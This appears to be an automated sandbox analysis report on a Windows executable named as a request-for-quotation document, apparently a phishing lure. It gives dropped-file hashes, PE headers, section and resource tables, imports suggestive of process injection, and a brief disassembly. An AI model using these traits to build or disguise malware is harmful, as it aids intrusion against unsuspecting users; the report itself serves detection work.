                                                                                                                                                                                                                            SHA-512:B98410F53055B6E7E6D49B1174256CEFA51311EBC01BDBBE1E0D787FCBC40F8D2D6045146DA14C89CE5D2F1F97A8025A27019DC6EAB2E8B6E803984BAC9D4664
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@.............................P.......q.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc.......p.......@..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1303552
                                                                                                                                                                                                                            Entropy (8bit):7.163064401862954
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:ZZ0FxT1UoYr99GdcJK7GJ0eeQ2yPyzc+E7xonyVGc/dT5N:HwWs6JLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:80D7884B22003F22FE0208D240E92F07
                                                                                                                                                                                                                            SHA1:1DDC9B75C0D39D06C5303EC37AF3CF7ED8C20B9B
                                                                                                                                                                                                                            SHA-256:8094095D878A08899CEF6F3001E622C15561FC976DE92CDBBDFD72BE0624721C
                                                                                                                                                                                                                            SHA-512:1BC171D3D46423AF0BECAA8488FA4D3B41317548A79D67FF20F281273939D14B7378FF24122886439A100480641DFA11DD274B48D9D8904CFAC0461779D43A37
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......-.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1445888
                                                                                                                                                                                                                            Entropy (8bit):4.951606030391467
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:9yocDApiGJ0eeQ2yPyzc+E7xonyVGc/dT5N:AocDAplJLeQVPyzc+E7xQ2l
                                                                                                                                                                                                                            MD5:C7C1209989B7DF6111BDCB8158CD7012
                                                                                                                                                                                                                            SHA1:B3325B2E89BA617B9ED82EE4C773259906F54E13
                                                                                                                                                                                                                            SHA-256:64BA4A859B329067EA5585D93AA6B1993ABED6F83F39EF2685B183D1AE2B9559
                                                                                                                                                                                                                            SHA-512:E0F7B78928414AAC38D0A0761992C1F7D0B279C3A42C408D7A284FCED6FBF10BE8122A5762A6EBA4F1B721FDD65FB9DA0B5ABD1CB98E1BB2A025D6A529F6326C
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@.............................P .....:b.... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc.......p.......0..............@...........................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2164736
                                                                                                                                                                                                                            Entropy (8bit):7.05639180657712
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:YWcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IKBJLeQVPyzc+E7xQ2l:60zuNIz1vcbE7xQ2l
                                                                                                                                                                                                                            MD5:04B39AF4F8E72AEADC4486811B47C3B7
                                                                                                                                                                                                                            SHA1:7D7437C21BC62C7CF33E6092D922F9F482F4640F
                                                                                                                                                                                                                            SHA-256:25133D24DCBD2DCF209456D2FE95D8A1B5664B40D79DF9D6A3C51F9C9E730D43
                                                                                                                                                                                                                            SHA-512:222410F1731E601DD2BEF0FAF73E48B104CDC2AB5736F9CE117DCB306359D853939A79FC2DBB4CE98D36E0356A29EB0CD14252C1B281947BD04B700BA36214A5
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!.......!... .......... ...............................z......h...|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):0.10005826978093514
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:Qc7/Q3l/k/uMclF6vMclFq5zwi71NOn+SkUeYDwDzyme/Zj:nzQV/kqF69Fq5zP7O+pawHymO1
                                                                                                                                                                                                                            MD5:217507D162F3B6046C2507598D70392E
                                                                                                                                                                                                                            SHA1:D003E68FEC6A079C9683908D73AC61C9BC89132E
                                                                                                                                                                                                                            SHA-256:5D6BBD2A14126E4C3E0A9120CBA829682A67C425300A6C196A0BC6AB55B5A8E1
                                                                                                                                                                                                                            SHA-512:49246E7D50598A00B353AED35C47CE6ED669D1C99245C0FF28E6268267F8E4E679010BD14101085E7949A0A32DB93C043FC051322801AFB81DF999966AD771CD
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:....`...`.......................................`...!...........................|...x...G>Bj....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O................O..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.|...x...G>Bj....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):0.10141972175807497
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:DTI3l/k/uMclF6vMclFq5zwaNMu3n+SkUeYDwDzyMjxb:DTIV/kqF69Fq5zTX+pawHy8F
                                                                                                                                                                                                                            MD5:70B75DD76FF06B1B2FC4B1CBDCF22623
                                                                                                                                                                                                                            SHA1:9887BB63CE0E1F9341C9435126C06CE74DC21BF1
                                                                                                                                                                                                                            SHA-256:5EC019FF46F8367167E905517BCA59C11B434F6BC82419D4A8121F561635B059
                                                                                                                                                                                                                            SHA-512:BE8D00F4E99893672CC2FB512F2069E2532865BD6A0218E163ABDC398EB50178E533B00CD99B13E1648054AD7290C700540FBC778E50ABA9E6F7C7665CD94AD4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:....h...h.......................................h...!...........................|...x...z`Cj....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O..............O..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.|...x...z`Cj............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):0.09894005377658292
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:uoGQ3Nk/uMclF6vMclFq5zwk1NIn+SkUeYDwDzyPZr:uLQ9kqF69Fq5zBI+pawHyP9
                                                                                                                                                                                                                            MD5:28E11F1CBDBD114852E36069C55A3D1B
                                                                                                                                                                                                                            SHA1:DB541037A24EA61E5354B38AE8467FEEC2E2866F
                                                                                                                                                                                                                            SHA-256:F417170FDA7763F9DA4FCE58FD8DD07078701A5DB5D7F3C9B810A081A71AD974
                                                                                                                                                                                                                            SHA-512:6C6FFD1FF8CB34F83B5539D963AFFD55928A2F556208ACFA288BD067CE657D874B2235E9B69CD0B0BA3D71E01AD910751196E73512218CC57CC9148E05D1A80E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:....X...X.......................................X...!...........................|...x...(.Bj....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O...............O..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P.|...x...(.Bj............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.392445518287452
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:REQUEST FOR QUOTATION 1307-RFQ.exe
                                                                                                                                                                                                                            File size:1'553'920 bytes
                                                                                                                                                                                                                            MD5:821aec135ea3aa8e02fab9d0cc783a0b
                                                                                                                                                                                                                            SHA1:67a03996c124db163d83a179f8a517e63d45f742
                                                                                                                                                                                                                            SHA256:a5d810f05768fff1eeba5ceeb410a0d4d61271fa12c7b5a88251fc1e391f453a
                                                                                                                                                                                                                            SHA512:fb1bf2b68bee1dedee3ab5cfeb66b2b05cbc9ae69c5edb5ce4f7701e1acad2885b2d355f40c5c70ae6291fa629de2d1925428b8a8b94d34cf6a6bdeca6681029
                                                                                                                                                                                                                            SSDEEP:24576:ku6J3UO0c+JY5UZ+XC0kGso6Fa+R1yiEWYBGJ0eeQ2yPyzc+E7xonyVGc/dT5N:eZ0c++OCvkGs9Fa+R1yoYsJLeQVPyzcZ
                                                                                                                                                                                                                            TLSH:D575E02263DDC360CB769173BF2AB7016EBF7C614630B95B2F980D7DA960161122D7A3
                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                                                                                                                                                                            Icon Hash:aaf3e3e3938382a0
                                                                                                                                                                                                                            Entrypoint:0x427dcd
                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x67577E20 [Mon Dec 9 23:32:48 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            call 00007F2550B7AB3Ah
                                                                                                                                                                                                                            jmp 00007F2550B6D904h
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                            push edi
                                                                                                                                                                                                                            push esi
                                                                                                                                                                                                                            mov esi, dword ptr [esp+10h]
                                                                                                                                                                                                                            mov ecx, dword ptr [esp+14h]
                                                                                                                                                                                                                            mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                                                                            mov edx, ecx
                                                                                                                                                                                                                            add eax, esi
                                                                                                                                                                                                                            cmp edi, esi
                                                                                                                                                                                                                            jbe 00007F2550B6DA8Ah
                                                                                                                                                                                                                            cmp edi, eax
                                                                                                                                                                                                                            jc 00007F2550B6DDEEh
                                                                                                                                                                                                                            bt dword ptr [004C31FCh], 01h
                                                                                                                                                                                                                            jnc 00007F2550B6DA89h
                                                                                                                                                                                                                            rep movsb
                                                                                                                                                                                                                            jmp 00007F2550B6DD9Ch
                                                                                                                                                                                                                            cmp ecx, 00000080h
                                                                                                                                                                                                                            jc 00007F2550B6DC54h
                                                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                                                            xor eax, esi
                                                                                                                                                                                                                            test eax, 0000000Fh
                                                                                                                                                                                                                            jne 00007F2550B6DA90h
                                                                                                                                                                                                                            bt dword ptr [004BE324h], 01h
                                                                                                                                                                                                                            jc 00007F2550B6DF60h
                                                                                                                                                                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                                                                                                                                                                            jnc 00007F2550B6DC2Dh
                                                                                                                                                                                                                            test edi, 00000003h
                                                                                                                                                                                                                            jne 00007F2550B6DC3Eh
                                                                                                                                                                                                                            test esi, 00000003h
                                                                                                                                                                                                                            jne 00007F2550B6DC1Dh
                                                                                                                                                                                                                            bt edi, 02h
                                                                                                                                                                                                                            jnc 00007F2550B6DA8Fh
                                                                                                                                                                                                                            mov eax, dword ptr [esi]
                                                                                                                                                                                                                            sub ecx, 04h
                                                                                                                                                                                                                            lea esi, dword ptr [esi+04h]
                                                                                                                                                                                                                            mov dword ptr [edi], eax
                                                                                                                                                                                                                            lea edi, dword ptr [edi+04h]
                                                                                                                                                                                                                            bt edi, 03h
                                                                                                                                                                                                                            jnc 00007F2550B6DA93h
                                                                                                                                                                                                                            movq xmm1, qword ptr [esi]
                                                                                                                                                                                                                            sub ecx, 08h
                                                                                                                                                                                                                            lea esi, dword ptr [esi+08h]
                                                                                                                                                                                                                            movq qword ptr [edi], xmm1
                                                                                                                                                                                                                            lea edi, dword ptr [edi+08h]
                                                                                                                                                                                                                            test esi, 00000007h
                                                                                                                                                                                                                            je 00007F2550B6DAE5h
                                                                                                                                                                                                                            bt esi, 03h
                                                                                                                                                                                                                            jnc 00007F2550B6DB38h
                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                            • [ASM] VS2013 build 21005
                                                                                                                                                                                                                            • [ C ] VS2013 build 21005
                                                                                                                                                                                                                            • [C++] VS2013 build 21005
                                                                                                                                                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                                                                                                                                                                            • [RES] VS2013 build 21005
                                                                                                                                                                                                                            • [LNK] VS2013 UPD4 build 31101
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x24f98.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            .text0x10000x8dcc40x8de00e4e4621c73040e5bf9386bc16ab805a0False0.5728661894273128data6.676118515745593IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .rsrc0xc70000x24f980x250009377d72e1b7f76fbcb71325ba698dc77False0.8228132918074325data7.6050258517843545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                            .reloc0xec0000x960000x950001abc45260ebd63eb6d52df6b739b21d4False0.9738212431837249data7.920466674151345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                                            RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                                            RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                                            RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                                                                                                                            RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                                                                                                                            RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                                                                                                                            RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                                                                                                                            RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                                                                                                                            RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                                                                                                                            RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                                                                                                                            RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                                                                                                                            RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                            RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                                                                                                                            RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                                                                                                                            RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                                                                                                                            RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                                            RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                            RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                                                                                                                            RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                                                                                                                            RT_RCDATA0xcf7b80x1c25edata1.0003989799989592
                                                                                                                                                                                                                            RT_GROUP_ICON0xeba180x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                                                                                                                            RT_GROUP_ICON0xeba900x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                            RT_GROUP_ICON0xebaa40x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                            RT_GROUP_ICON0xebab80x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                            RT_VERSION0xebacc0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                                                                                                            RT_MANIFEST0xebba80x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                                                                                                                                                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                                                                                                                                                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                                                                                                                                                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                                                                                                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                                                                                                                                                                            PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                                                                                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                                                                                                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                                                                                                                            UxTheme.dllIsThemeActive
                                                                                                                                                                                                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
